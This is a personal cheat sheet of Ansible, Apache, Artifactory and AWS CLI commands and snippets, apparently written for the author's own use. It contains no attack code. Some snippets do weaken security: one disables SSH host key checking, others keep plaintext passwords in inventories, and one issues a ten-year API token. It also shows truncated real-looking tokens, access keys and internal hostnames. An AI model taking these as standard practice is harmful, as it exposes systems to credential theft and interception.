ssh-keygen -t rsa -b 4096 -m PEM -f my_ssh_key.pem
ll my_ssh_key.pem

ansible all -i desp000111.vantage.zur, --user=vitalii.cherkashyn -e ansible_ssh_private_key_file=my_ssh_key.pem -m "ping" -vvv

inventory ini file

# example cfg file
[web]
host1
host2 ansible_port=222 # defined inline, interpreted as an integer

[web:vars]
http_port=8080 # all members of 'web' will inherit these
myvar=23 # defined in a :vars section, interpreted as a string

inventory dynamic inventory from any source

pip install ansible  # the ansible-inventory command ships with ansible

python script ( for instance my-inventory.py )

  • should generate json output:
python my-inventory.py --list
{
    "group1": {
        "hosts": ["host1", "host2"],
        "vars": {
            "ansible_user": "admin",
            "ansible_become": True
        },
        "children":["group2"]
    },
    "group2": {
        "hosts": ["host3"],
        "vars": {
            "ansible_user": "user",
            "ansible_become": False
        },
        "children":[]
    }
}
  • should generate json output:
python my-inventory.py --host host1
{
  "ansible_user": "admin",
  "ansible_become": True
}

How to check the script:

chmod +x my-inventory.py

ansible -i my-inventory.py all -m ping

execute with specific remote python version, remote python, rewrite default variables, rewrite variables, override variable

--extra-vars "remote_folder=$REMOTE_FOLDER ansible_python_interpreter=/usr/bin/python"
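for example, as a full command ( playbook and inventory names are placeholders ):

ansible-playbook -i inventory.ini playbook.yml \
  --extra-vars "remote_folder=$REMOTE_FOLDER ansible_python_interpreter=/usr/bin/python"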

execute minimal playbook locally minimal example start simplest playbook

check-variable.yaml content:

- hosts: localhost
  tasks:
  - name: echo variable to console
    ansible.builtin.debug:
      msg: System {{ inventory_hostname }} has gateway {{ ansible_default_ipv4.gateway }}
    no_log: false

log output can be suppressed ( no log output )

ansible-playbook check-variable.yaml  -v

another example but with roles

- hosts: localhost
  user: user_temp
  roles:
    - my_own_role

execute ansible for one host only, one host, one remote server, verbosity

ansible-playbook -i "ubs000015.vantage.org , " mkdir.yaml 

ansible-playbook welcome-message.yaml -i airflow-test-account-01.ini --limit worker --extra-vars="ACCOUNT_ID=QA01" --user=ubuntu --ssh-extra-args="-i $EC2_KEY" -vvv

ansible all -i airflow-test-account-01.ini --user=ubuntu --ssh-extra-args="-i $EC2_KEY" -m "ping" -vvv
ansible main,worker -i airflow-test-account-01.ini --user=ubuntu --ssh-extra-args="-i $EC2_KEY" -m "ping"

simple file for creating one folder

- hosts: all
  tasks:
    - name: Creates directory
      file:
        path: ~/spark-submit/trafficsigns
        state: directory
        mode: 0775
    - name: copy all files from folder
      copy: 
        src: "/home/projects/ubs/current-task/nodes/ansible/files" 
        dest: ~/spark-submit/trafficsigns
        mode: 0775

    - debug: msg='folder was created for host {{ ansible_host }}'

execute ansible locally, local execution

# --extra-vars="mapr_stream_path={{ some_variable_from_previous_files }}/some-argument" \

ansible localhost \
    --extra-vars="deploy_application=1" \
    --extra-vars=@group_vars/all/vars/all.yml \
    --extra-vars=@group_vars/ubs-staging/vars/ubs-staging.yml \
    -m include_role \
    -a name="roles/labeler"

execute ansible-playbook with external parameters, bash script ansible-playbook with parameters, extra variables, external variables, env var

# variable from env
{{ lookup('env','DB_VARIANT_USERNAME') }}
ansible-playbook -i inventory.ini playbook.yml --extra-vars "$*"

with path to file for external parameters, additional variables from external file

ansible-playbook -i inventory.ini playbook.yml --extra-vars @/path/to/var.properties
ansible-playbook playbook.yml --extra-vars=@/path/to/var.properties

external variables inline

ansible-playbook playbook.yml --extra-vars="oc_project=scenario-test mapr_stream_path=/mapr/prod.zurich/vantage/scenario-test"

check if it is working, ad-hoc command

ansible remote* -i inventory.ini -m "ping"
ansible remote* -i inventory.ini --module-name "ping"

## shell
ansible all --module-name shell --args 'free -m'
# sequence output with fork=1
ansible all --module-name shell --args uptime -f 1

## command
ansible all --module-name command --args 'fdisk -l' --become

## ansible-doc apt
ansible localhost --module-name apt --args 'name=python3 state=present'

## file
# create
ansible all --module-name file --args "path=/tmp/demo_1.txt state=touch mode=666"
ansible all --module-name file --args "path=/tmp/output state=directory mode=666"
# delete
ansible all --module-name file --args "path=/tmp/demo_1.txt state=absent mode=666"
# copy
ansible all --module-name copy --args "src=~/demo.txt dest=/tmp/demo.txt remote_src=yes"
ansible remote* -i inventory.ini -a "hostname"

loop example

    - name: scripts {{ item }}
      template:
        mode: 0777 
        src: "templates/{{ item }}" 
        dest: "{{ root_folder }}/{{ item }}" 
      loop:
        - "start-all.sh"
        - "status.sh"
        - "stop-all.sh"

repeat execution

--limit @{playbookfile}.retry
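for example, re-running only the hosts that failed in the previous run ( the .retry file is written next to the playbook only when retry files are enabled in ansible.cfg ):

ansible-playbook playbook.yml --limit @playbook.retry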

start with task, execute from task, begin with task, skip previous tasks

ansible-playbook playbook.yml --start-at-task="name of the start to be started from"

replace variables inside file to dedicated file, move vars to separate file

  • before
   vars:
      db_user: my_user
      db_password: my_password
      ansible_ssh_pass: my_ssh_password 
      ansible_host: 192.168.1.14
  • after ( 'vars' block is empty ) filepath:
./host_vars/id_of_the_server

or group_vars:

./group_vars/name_of_the_group_from_square_brackets

code

db_user: my_user
db_password: my_password
ansible_ssh_pass: my_ssh_password 
ansible_host: 192.168.1.14

move code to separate file, tasks into file

cut code from original file and paste it into separate file ( with appropriate alignment !!! ), write instead of the code:

    - include: path_to_folder/path_to_file

the appropriate file should be created:

./path_to_folder/path_to_file

skip/activate some tasks with labeling, tagging

tasks:
- template:
    src: template/activation.sh.j2
    dest: /usr/bin/activation.sh
  tags:
  - flag_activation

multitag, multi-tag

tasks:
- template:
    src: template/activation.sh.j2
    dest: /usr/bin/activation.sh
  tags:
  - flag_activation
  - flag_skip
ansible-playbook previous-block.yml --skip-tags "flag_activation"
# ansible-playbook previous-block.yml --skip-tags=flag_activation
# ansible-playbook previous-block.yml --tags "flag_activation"
# ansible-playbook previous-block.yml --tags=flag_activation

Debug

export ANSIBLE_STRATEGY=debug
# revert it afterwards ( avoid "ERROR! Invalid play strategy specified: "):
# export ANSIBLE_STRATEGY=linear

print variables

task.args
task.args['src']
vars()

change variables

del(task.args['src'])
task.args['src']="/new path to file"

set variable

- name: Set Apache URL
  set_fact:
    apache_url: 'http://example.com/apache'
    
- name: Download Apache
  shell: wget {{ apache_url }}    

shell == ansible.builtin.shell

manage playbook execution ( debugger commands )

redo
continue
quit
- name: airflow setup for main (web server) and workers
  hosts: all
  tasks:
  - name: airflow hostname
    debug: msg="{{ lookup('vars', 'ansible_host') }}"      
  - name: all variables from host
    debug: msg="{{ vars }}"
    when: run_mode == "debug"

debug command

  - debug:
      msg: "print variable: {{  my_own_var }}"
  - shell: /usr/bin/uptime
    register: result

  - debug:
      var: result

env variables bashrc

- name: source bashrc
  become: no
  shell: . /home/username/.bashrc && [the actual command you want run]

rsync copy files

  - name: copy source code
    synchronize:
      src: '{{ item.src }}'
      dest: '{{ item.dest }}'
      delete: yes
      recursive: yes
      rsync_opts:
        - "--exclude=.git"
        - "-avz"
        - '-e ssh -i {{ key }} '
    with_items:
    - { src: '{{ path_to_repo }}/airflow-dag/airflow_shopify/', dest: '/home/ubuntu/airflow/airflow-dag/airflow_shopify/' }

ec2 managing airflow ec2

export PATH=$PATH:/home/ubuntu/.local/bin
nohup airflow webserver

debug module

argument file ( args.json )

{
    "ANSIBLE_MODULE_ARGS": {
        "task_parameter_1": "just a string",
        "task_parameter_2": 50
    }
}

execute file

python3 -m pdb library/oc_collaboration.py args.json

set breakpoint

import pdb
...
pdb.set_trace()

run until breakpoint

until 9999
next

debug module inline, execute module inline, adhoc module check

ansible localhost -m debug --args msg="my custom message"
# collect facts
ansible localhost -m setup

task print all variables

- name: "Ansible | List all known variables and facts"
  debug:
    var: hostvars[inventory_hostname]

ansible-console

ansible-console
debug msg="my custom message"
shell pwd

ansible print stdout

# default ansible output
ANSIBLE_STDOUT_CALLBACK=yaml
# humand readable output
ANSIBLE_STDOUT_CALLBACK=debug

error handling, try catch

stop execution of steps (of playbook) when at least one server will throw error

  any_errors_fatal: true

not to throw error for one certain task

 - mail:
     to: [email protected]
     subject: info
     body: das ist information
   ignore_errors: yes

fail when, fail by condition, parse log file for errors

  - command: cat /var/log/server.log
    register: server_log_file
    failed_when : "'ERROR' in server_log_file.stdout"

template, Jinja2 templating, pipes, ansible filtering

default value

default path is {{ my_custom_path | default("/opt/program/script.sh") }}

escape special characters

{{ '{{ filename }}.log' }}

operation with list

{{ [1,2,3] | default(5) }}
{{ [1,2,3] | min }}
{{ [1,2,3] | max }}
{{ [1,2,3] | first }}
{{ [1,2,3] | last }}
{{ [1,2,3,2,3,] | unique }}
{{ [1,2,3] | union([1,2]) }}
{{ [1,2,3] | intersect([3]) }}
{{ 100 | random }}
{{ ["space", "separated", "value"] | join(" ") }}
{{'latest' if (my_own_value is defined) else 'local-build'}}

file name from path (return 'script.sh')

{{ "/etc/program/script.sh" | basename }}

copy file and rename it, pipe replace suffix

- name: Create DAG config
  template: src={{ item }} dest={{ airflow_dag_dir }}/config/{{ item | basename | regex_replace('\.j2','') }}
  with_fileglob:
    - ../airflow_dags/airflow_dags_gt/config/*.py.j2

jinja conditions

{% if deployment.jenkins_test_env is defined -%}
some yaml code
{% endif %}

copy reverse copy from destination machine

- name: Fetch template
  fetch:
    src: '{{ only_file_name }}'
    dest: '{{ destination_folder }}'
    flat: yes
  tags: deploy

directives for Jinja

to improve indentation globally in a file, add one of the following lines at the beginning

#jinja2: lstrip_blocks: True
#jinja2: trim_blocks:False
#jinja2: lstrip_blocks: True, trim_blocks: True

for improving indentation only for the block

<div>
        {%+ if something %}<span>hello</span>{% endif %}
</div>

condition example

{% if lookup('env','DEBUG') == "true" %}
    CMD ["java", "start-debug"]
{% else %}
    CMD ["java", "start"]
{% endif %}

directives for loop, for last, loop last

[
{% for stream in deployment.streams %}
    {
        "stream": "{{ stream.stream_name }}",
        "classN": "{{ stream.class_name }}",
        "script": "{{ stream.script_name }}",
        "sibFolders": [
        {% for folder in stream.sub_folders %}
            "{{ folder }}"{% if not loop.last %},{% endif %}
        {% endfor %}
        ]
    }{% if not loop.last %},{% endif %}
{% endfor %}
]

escaping

just a symbol

{{ '{{' }}

bigger piece of code

{% raw %}
    <ul>
    {% for item in seq %}
        <li>{{ item }}</li>
    {% endfor %}
    </ul>
{% endraw %}

template with tempfile

- hosts: localhost
  gather_facts: no
  tasks:
    - tempfile:
        state:  file
        suffix: config
      register: temp_config

    - template:
        src:  templates/configfile.j2
        dest: "{{ temp_config.path }}"

settings for modules

you also need to make Ansible aware of the module using one of the following options:

  • add your folder with module to environment variable ANSIBLE_LIBRARY
  • update $HOME/.ansible.cfg
    library=/path/to/module/library
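for example ( paths are placeholders ):

# option 1: environment variable
export ANSIBLE_LIBRARY=/path/to/module/library
# option 2: $HOME/.ansible.cfg
# [defaults]
# library = /path/to/module/library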

module documentation

ansible-doc -t module {name of the module}

minimal module

from ansible.module_utils.basic import AnsibleModule
def main():
    input_fields = {
        "operation": {"required": True, "type": "str"},
        "file": {"required": True, "type": "str"},
        "timeout": {"required": False, "type": "int", "default": "120"}
    }
    module = AnsibleModule(argument_spec=input_fields)
    operation = module.params["operation"]
    file = module.params["file"]
    timeout = module.params["timeout"]
    # module.fail_json(msg="you must be logged in into OpenShift")
    module.exit_json(changed=True, meta={operation: "create"})

if __name__ == "__main__":
    main()
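a sketch of calling such a module from a playbook task, assuming the file above is saved as library/my_module.py next to the playbook ( module name comes from the file name, parameters are the ones declared above ):

- hosts: localhost
  tasks:
    - name: call the custom module
      my_module:
        operation: create
        file: /tmp/example.txt
        timeout: 60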

example of plugin

{{ list_of_values | average }}

python code for plugin

def average(list):
    return sum(list) / float(len(list))
    
# Ansible discovers filter plugins via a class named FilterModule
class FilterModule(object):
    def filters(self):
        return {'average': average}

execution

export ANSIBLE_FILTER_PLUGINS=/full/path/to/folder/with/plugin
ansible-playbook playbook.yml

lookups

# documentation
ansible-doc -t lookup -l
ansible-doc -t lookup csvfile

lookup a value from a file with a special format

{{ lookup('csvfile', 'web_server file=credentials.csv delimiter=,') }}
{{ lookup('ini', 'password section=web_server file=credentials.ini') }}
{{ lookup('env','DESTINATION') }}
{{ lookup('file','/tmp/version.txt') }}

lookups variables

{{ hostvars[inventory_hostname]['somevar_' + other_var] }}

For ‘non host vars’ you can use the vars lookup plugin:
{{ lookup('vars', 'somevar_' + other_var) }}
- name: airflow setup for main (web server) and workers
  hosts: all
  tasks:
  - name: airflow hostname
    debug: msg="{{ lookup('vars', 'ansible_host') }}"      
  - name: variable lookup
    debug: msg="lookup data {{ lookup('vars', 'ansible_host')+lookup('vars', 'ansible_host') }}"
  - name: read from ini, set variable
    set_fact:
      queues: "{{ lookup('ini', lookup('vars', 'ansible_host')+' section=queue file=airflow-'+lookup('vars', 'account_id')+'-workers.ini') }}"
  - name: airflow lookup
    debug: msg=" {{ '--queues '+lookup('vars', 'queues') if lookup('vars', 'queues') else '<default>'  }}"

inventory file


inventory file, inventory file with variables, rules

[all]
10.2.2.24
10.2.2.25
10.2.2.26
[remote_ssh]
172.28.128.3     ansible_connection=ssh   ansible_port=22   ansible_user=tc     ansible_password=tc

dynamic inventory

use a python script inventory.py ( with 'py' extension ) instead of a txt file

import json
data = {"databases": {"hosts": ["host1", "host2"], "vars": {"ansible_ssh_host":"192.168.10.12", "ansible_ssh_pass":"Passw0rd"} }}
print(json.dumps(data))

the script should also support the following calls:

inventory.py --list
inventory.py --host databases

prepared scripts

inventory file with variables ( python Jinja templating)

[remote_ssh]
172.28.128.3     ansible_connection=ssh   ansible_port=22   ansible_user=tc     ansible_password=tc   http_port=8090

playbook usage:

'{{http_port}}'

execution with inventory examples

for one specific host without inventory file

ansible-playbook playbook.yml -i 10.10.10.10

with inventory file

ansible-playbook -i inventory.ini playbook.yml 

issue with execution playbook for localhost only, local execution

Note that the implicit localhost does not match 'all'
...
skipping: no hosts matched 

solution

ansible-playbook --inventory="localhost," --connection=local --limit=localhost --skip-tags="python-script" playbook.yaml

# example with external variables
ansible-playbook --inventory="localhost," --connection=local --limit=localhost \
--extra-vars="oc_project=scenario-test mapr_stream_path=/mapr/prod.zurich/vantage/scenario-test" \
--tags="scenario-service" deploy-scenario-pipeline.yaml

solution2

#vim /etc/ansible/hosts
localhost ansible_connection=local

strategy


  strategy: linear
  • linear ( default ) after each step waiting for all servers
  • free independently for all servers - someone can finish installation significantly earlier than others

additional parameter - specify amount of servers to be executed at the time ( for default strategy only )

  serial: 3
  serial: 20%
  serial: [5,15,20]

default value "serial" into configuration ansible.cfg

forks = 5

async execution, nowait task, command execution

not all modules support this operation. Execute a command in asynchronous mode ( with a preliminary estimation of 120 sec ), with the default poll interval for the result - 10 ( seconds )

  async: 120

execute command in asynchronous mode ( with preliminary estimation 120 sec ), with poll result of the command - 60 ( seconds )

  async: 120
  poll: 60

execute command and forget, not to wait for execution

  async: 120
  poll: 0

execute command in asynchronous mode, register result checking result at the end of the file

- command: /opt/my_personal_long_run_command.sh
  async: 120
  poll: 0
  register: custom_command_result
  
- name: check status result
  async_status: jid={{ custom_command_result.ansible_job_id }}
  register: command_result
  until: command_result.finished
  retries: 20

roles


init project ansible-galaxy, create new role, init role

execute the command in your project folder './roles'

ansible-galaxy init {project/role name}

result:

./roles/{project/role name}
	#         Main list of tasks that the role executes
    /tasks
	#         Files that the role deploys
    /files
	#         Handlers, which may be used within or outside this role
    /handlers
	#         Modules, which may be used within this role
    /library
	#         Default variables for the role
    /defaults
	#         Other variables for the role
    /vars
	#         Templates that the role deploys
    /templates
	#         Metadata for the role, including role dependencies
    /meta

insert into code

  roles:
  - {project/role name}

all folders of the created project will be applied to your project ( tasks, vars, defaults ); in case of manual creation, only the necessary folders need to be created

ansible search for existing role

ansible-galaxy search {project/role name/some text}
ansible-galaxy info role-name

import existing roles from ansible galaxy

cd roles
ansible-galaxy install {name of the project/role}

# print out existing roles
ansible-galaxy role list 

insert into code

  roles:
  - {project/role name}

all folders of the imported project will be applied to your project ( tasks, vars, defaults )

import task from role, role.task, task inside role

- hosts: localhost
  # hosts: all
  # hosts: <name of section from inventory file>
  tasks:
  - name: first step
    include_role:
      name: mapr-kafka
      tasks_from: cluster-login

or

- name: Deploy session
  import_tasks: roles/dag-common/tasks/deployment-tasks.yaml
  vars:
    dag_deploy_dir: /mapr/swiss.zur/airlfow/deploy
  tags:
    - release

export

create/update file:

./roles/{project/role name}/meta/main.yml
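a minimal sketch of such a meta/main.yml ( author and values are placeholders ):

galaxy_info:
  author: your_name
  description: example role
  min_ansible_version: "2.9"
dependencies: []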

local run local start playbook

- hosts: localhost
  tasks:
  - name: Ansible create file with content example
    copy:
      dest: "/tmp/remote_server.txt"
      content: |
        dog
        tiger

minimal playbook

- hosts: localhost
  tasks:
  - name: Ansible create file with content example
    copy:
      dest: "/tmp/remote_server.txt"
      content: |
        {{ lookup('env','TEST_1') }}
        {{ lookup('env','TEST_2') }}
ansible-playbook ansible-example.yml

execute role, role execution, start role locally, local start, role local execution, check role

ansible-galaxy init print-message

echo '- name: "update apt packages."
  become: yes
  apt:
    update_cache: yes
    
- name: install apache
  apt:
    name: ["apache2"]

- name: create file
  shell:
    cmd: echo "hello from container {{ role_name }}" > /var/www/html/index.html

- name: start service
  service:
    name: "apache2"
    state: "started"
' > print-message/tasks/main.yml

# execute for localhost
ansible localhost --module-name include_role --args 'name=print-message'

# execute ansible role for docker container
docker run --detach atlassian/ssh-ubuntu:0.2.2
ansible all -i 172.17.0.2, --extra-vars "ansible_user=root ansible_password=root" --module-name include_role --args 'name=print-message'

x-www-browser http://172.17.0.2
ansible localhost \
    --extra-vars="deploy_application=1" \
    --extra-vars=@group_vars/all/defaults/all.yaml \
    --extra-vars=@group_vars/all/vars/all.yaml \
    --extra-vars="mapr_stream_path={{ some_variable_from_previous_files }}/some-argument" \
    -m include_role \
    -a name="new_application/new_role"

where "include_role" - module to run ( magic word )
where "new_application/new_role" - subfolder to role where @group_vars/all/default/all.yaml - sub-path to yaml file with additional variables

console output with applied roles should look like

TASK [{project/role name}: {task name}] ***********************************

for example

TASK [java : install java with jdbc libraries] ***********************************

file encryption, vault

ansible-vault encrypt inventory.txt
ansible-vault view inventory.txt
ansible-vault create inventory.txt

ask password via command line

ansible-playbook playbook.yml -i inventory.txt --ask-vault-pass

file should contain the password

ansible-playbook playbook.yml -i inventory.txt --vault-password-file ./file_with_pass.txt

script should return password

ansible-playbook playbook.yml -i inventory.txt --vault-password-file ./file_with_pass.py

modules

apt, python installation

- name: example of apt install 
  apt: name='{{ item }}' state=present
  with_items:
    - python
    - python-setuptools
    - python-dev
    - build-essential
    - python-pip
- name: example of start unix service
  service:
    name: mysql
    state: started
    enabled: yes
- name: manage python packages via pip 
  pip:
    name: flask

include variables import variables

- name: External variables
  include_vars: roles/marker-table/defaults/main.yaml
  tags: deploy

echo

add a verbosity flag for ansible or ansible-playbook: -v (1), -vv (2) or -vvv (3)

- debug:
    msg: ">>> {{ data_portal_deploy_folder }}/data-portal.jar"
    # 'msg' and 'var' are mutually exclusive - use only one of them
    # var: src
    verbosity: 2
- name: Ensure MOTD file is in place
  copy:
    src: files/motd
    dest: /etc/motd
    owner: root
    group: root
    mode: 0644
    
- name: Ensure MOTD file is in place
  copy:
    content: "Welcome to this system."
    dest: /etc/motd
    owner: root
    group: root
    mode: 0644
- name: Ensure MOTD file is in place
  template:
    src: templates/motd.j2
    dest: /etc/motd
    owner: root
    group: root
    mode: 0644
- name: Ensure user1 exists
  user:
    name: user1
    group: users
    groups: wheel
    uid: 2001
    password: "{{ 'mypassword' | password_hash('sha512') }}"
    state: present
- name: Ensure Apache package is installed
  package:
    name: httpd
    state: present
- name: Ensure port 80 (http) is open
  firewalld:
    service: http
    state: enabled
    permanent: yes
    immediate: yes
- name: Ensure directory /app exists
  file:
    path: /app
    state: directory
    owner: user1
    group: docker
    mode: 0770
- name: Ensure host my-own-host in hosts file
  lineinfile:
    path: /etc/hosts
    line: 192.168.0.36 my-own-host
    state: present
    
- name: Ensure root cannot login via ssh
  lineinfile:
    path: /etc/ssh/sshd_config
    regexp: '^PermitRootLogin'
    line: PermitRootLogin no
    state: present

delegate task to specific host

- name: Set version information
  lineinfile:
    path: "{{ working_folder }}/version.json"
    regexp: "{{ item.Reg }}"
    line: "{{ item.Line }}"
  with_items:
    - { Reg: 'releaseName', Line: '"releaseName": "{{ release_name }}",' }
    - { Reg: 'releaseNotesUrl', Line: '"releaseNotesUrl": "{{ release_notes_url }}",' }
  delegate_to: localhost
  tags: deploy
- name: Extract content from archive
  unarchive:
    src: /home/user1/Download/app.tar.gz
    dest: /app
    remote_src: yes
- name: Run bash script
  command: "/home/user1/install-package.sh"

TBD

  • system
  • commands
  • database
  • cloud
  • windows

issues

fingerprint checking

fatal: [172.28.128.4]: FAILED! => {"msg": "Using a SSH password instead of a key is not possible because Host Key checking is enabled and sshpass does not support this.  Please add this host's fingerprint to your known_hosts file to manage this host."}

resolution

export ANSIBLE_HOST_KEY_CHECKING=False
ansible-playbook -i inventory.ini playbook-directory.yml

apache server cheat sheet

apache tutorial

apache installation apache settings

manage httpd

# apache server installation, apache server run, web server run, webserver start
sudo su
yum update -y
yum install -y httpd
service httpd start
chkconfig httpd
chkconfig httpd on
vim /var/www/html/index.html

debian apache simple installation

#!/bin/sh
sudo apt update
sudo apt install apache2 -y
sudo ufw allow 'Apache'
sudo systemctl start apache2
# Create a new index.html file at  /var/www/html/ path
echo "<html> <head><title>server 01</title> </head> <body><h1>This is server 01 </h1></body> </html>" > /var/www/html/index.html

debian apache installation

# installation
sudo su
apt update -y
apt install -y apache2

# service 
sudo systemctl status apache2.service
sudo systemctl start apache2.service

# change index html
vim /var/www/html/index.html

# Uncomplicated FireWall
ufw app list
ufw allow 'Apache'
ufw status

# enable module
a2enmod rewrite

# disable module
# http://manpages.ubuntu.com/manpages/trusty/man8/a2enmod.8.html
a2dismod rewrite

# enable or disable site/virtual host
# http://manpages.ubuntu.com/manpages/trusty/man8/a2ensite.8.html
a2dissite *.conf
a2ensite my_public_special.conf

apache management

sudo service apache2 start
sudo service apache2 restart

apache SSL

activate ssl module

sudo a2enmod ssl
sudo a2dismod ssl

creating self-signed certificates

sudo make-ssl-cert generate-default-snakeoil --force-overwrite

check certificates

sudo ls -la /etc/ssl/certs/ssl-cert-snakeoil.pem
sudo ls -la /etc/ssl/private/ssl-cert-snakeoil.key

cert configuration

vim /etc/apache2/sites-available/default-ssl.conf
                SSLCertificateFile      /etc/ssl/certs/ssl-cert-snakeoil.pem
                SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key

Generating a RSA private key

openssl req -new -newkey rsa:2048 \
-nodes -out cherkavideveloper.csr \
-keyout cherkavideveloper.key \
-subj "/C=DE/ST=Bavaria/L=München/O=cherkavi/CN=cherkavi developer"

vim /etc/apache2/sites-available/default-ssl.conf
SSLCertificateFile "/path/to/www.example.com.cert"
SSLCertificateKeyFile "/path/to/www.example.com.key"

parallel open connection

<IfModule mpm_prefork_module>
	  #LoadModule cgi_module modules/mod_cgi.so
    StartServers       5
    MinSpareServers    7
    MaxSpareServers   15
    ServerLimit 600
    MaxRequestWorkers 600
    MaxConnectionsPerChild 0
</IfModule>

Apache in OpenShift/Kubernetes

flowchart LR
    client --> or[ocp route] --> os[ocp service] --> op[ocp pod] --> a[apache]
    cm[config map] -.->|read| a
    a --> os2[ocp service 2]
    a --> os3[ocp service 3]

Apache with Keycloak


Artifactory cheat sheet

REST endpoints

token generation

ARTIFACTORY_URL=https://artifactory.sbbgroup.net/artifactory 
USERNAME="cherkavi"
curl -u "$USERNAME" -XPOST "$ARTIFACTORY_URL/api/security/token" -d "username=$USERNAME" -d "scope=member-of-groups:*" -d "expires_in=315360000"

plain password should be replaced in files

# ~/.git-credentials
# ~/.m2/settings.xml
curl -H "Authorization: Bearer $TOKEN" -X GET "${ARTIFACTORY_URL}/artifactory/api/system/ping"
# check token: https://jwt.io/#encoded-jwt

get artifact from artifactory

URL="https://artifactory.sbbgroup.net/artifactory/management-snapshots/com/ad/cicd/jenkins/jenkins-labeling-6b999cadc054-SNAPSHOT-jenkins.zip"
OUTPUT_FILE=`echo $URL | awk -F '/' '{print $(NF)}'`
rm $OUTPUT_FILE
curl -u $ARTIFACTORY_USER:$ARTIFACTORY_PASS -X GET  $URL -o $OUTPUT_FILE
ls -la $OUTPUT_FILE

mv $OUTPUT_FILE $OUTPUT_FILE-original

upload to artifactory

URL="https://artifactory.sbbgroup.net/artifactory/management-snapshots/com/ad/cicd/jenkins/jenkins-labeling-6b999cadc054-SNAPSHOT-jenkins.zip"
OUTPUT_FILE=`echo $URL | awk -F '/' '{print $(NF)}'`
UPLOAD_FILE="jenkins-labeling-6b999cadc054-SNAPSHOT-jenkins.zip"
curl -u $ARTIFACTORY_USER:$ARTIFACTORY_PASS -X PUT  $URL --data-binary @${UPLOAD_FILE}

# curl -v --user username:password -X PUT urlGoesHere --data-binary fileToBeDeployed

upload docker image to artifactory

DOCKER_USER=tech-user
DOCKER_TOKEN=shyqWHDzXMwtQ....
DOCKER_URL=artifactory.ubsgroup.com

docker login -u $DOCKER_USER -p $DOCKER_TOKEN $DOCKER_URL
DOCKER_IMAGE=$DOCKER_URL/project-docker/portal-e2e:2.0.0
docker push $DOCKER_IMAGE

F.A.Q

error from endpoint

{
  "errors" : [ {
    "status" : 403,
    "message" : "The user: 'tu-datacenter' is not permitted to deploy ... 
  } ]
}

check user's permission

AWS cheat sheet

Visual tools for drawing architecture

links

DOCUMENTATION

examples

trainings

others

decisions

way of building architecture

way of building architecture

cloud advisor

cloud-advisor

fault tolerance, high performance

fault tolerance, high performance

shared responsibility model

shared model

serverless

serverless

ARN - Amazon Resource Name

all resources in the cloud have an ARN name
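the general ARN format ( exact fields depend on the service; account id below is a placeholder ):

arn:partition:service:region:account-id:resource-id
# example: arn:aws:sns:eu-central-1:123456789012:my-topic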

sdk commands:

  • low level commands
  • high level commands

sdk operations:

  • blocking - synchronous
  • unblocking - asynchronous

aws CDK - Cloud Development Kit

pip search aws-cdk-lib
pip install aws-cdk-lib
npm search @aws-cdk
npm install [email protected]

aws cli

aws cli is a python application

# installation
sudo apt install awscli
pip install awscli
# set up user
aws configure
docker run --rm -it  -v $(pwd):/aws  public.ecr.aws/aws-cli/aws-cli --version
# share local credentials with docker container 
docker run --rm -it  -v $(pwd):/aws  -v ~/.aws:/root/.aws public.ecr.aws/aws-cli/aws-cli command

console command completion, console completion

pip3 install awscli
# complete -C `locate aws_completer` aws
complete -C aws_completer aws

be aware about precedence:

  1. Credentials from environment variables have precedence over credentials from the shared credentials and AWS CLI config file.
    env variables: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html
  2. Credentials specified in the shared credentials file have precedence over credentials in the AWS CLI config file.

botocore.exceptions.ProfileNotFound: The config profile (cherkavi-user) could not be found

vim ~/.aws/credentials
[cherkavi-user]
aws_access_key_id = AKI...
aws_secret_access_key = ur1DxNvEn...
aws_session_token = FwoG....

or

aws configure set aws_session_token "Your-value" --profile cherkavi-user
# or
aws configure set cherkavi-user.aws_session_token "Your-value" 

check configuration: vim ~/.aws/config

using profiling

--region, --output, --profile

aws configure list-profiles
# default profile will be used from env variable AWS_PROFILE
aws s3 ls --profile $AWS_PROFILE

login: set AWS credentials via env variables

# source file_with_credentials.sh
export AWS_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=SEP6...

login: set AWS credentials via config file

# aws cli version 2
aws configure set aws_access_key_id <yourAccessKey>
aws configure set aws_secret_access_key <yourSecretKey>
# aws configure set aws_session_token <yourToken>

# aws cli version 1
aws configure set ${AWS_PROFILE}.aws_access_key_id ...
aws configure set ${AWS_PROFILE}.aws_secret_access_key ...
# aws configure set ${AWS_PROFILE}.aws_session_token ...

login: get AWS credentials via config file

aws configure get aws_access_key_id

login: sso

aws configure sso

# check configuration:
cat ~/.aws/config | grep sso-session

activate profile

aws sso login --sso-session $SSO-SESSION_NAME
aws sso login --profile $AWS_PROFILE_DEV

or

# aws configure export-credentials --profile RefDataFrame-cicd --format env
eval "$(aws configure export-credentials --profile RefDataFrame-cicd --format env)"

debugging collaboration verbosity full request

for API level debugging you should use CloudTrail

aws --debug s3 ls --profile $AWS_PROFILE

init variables

inline initialization

or put the same into a separate file and source it: . /home/projects/current-project/aws.sh

# export HOME_PROJECTS_GITHUB - path to the folder with cloned repos from https://github.com/cherkavi
export AWS_SNS_TOPIC_ARN=arn:aws:sns:eu-central-1:85153298123:gmail-your-name
export AWS_KEY_PAIR=/path/to/file/key-pair.pem
export AWS_PROFILE=aws-user
export AWS_REGION=eu-central-1

# aws default value for region 
export AWS_DEFAULT_REGION=eu-central-1

export current_browser="google-chrome" # current_browser=$BROWSER
export aws_service_abbr="sns"
function aws-cli-doc(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi
    x-www-browser "https://docs.aws.amazon.com/cli/latest/reference/${aws_service_abbr}/index.html" &
}
function aws-faq(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi
    x-www-browser "https://aws.amazon.com/${aws_service_abbr}/faqs/" &
}
function aws-feature(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi    
    x-www-browser "https://aws.amazon.com/${aws_service_abbr}/features/" &
}
function aws-console(){
    if [[ -z $aws_service_abbr ]]; then
        echo 'pls, specify the env var: aws_service_abbr'
        return 1
    fi
    x-www-browser "https://console.aws.amazon.com/${aws_service_abbr}/home?region=$AWS_REGION" &
}

check configuration

vim ~/.aws/credentials

aws configure list
# default region will be used from env variable: AWS_REGION
aws configure get region --profile $AWS_PROFILE
aws configure get aws_access_key_id
aws configure get default.aws_access_key_id
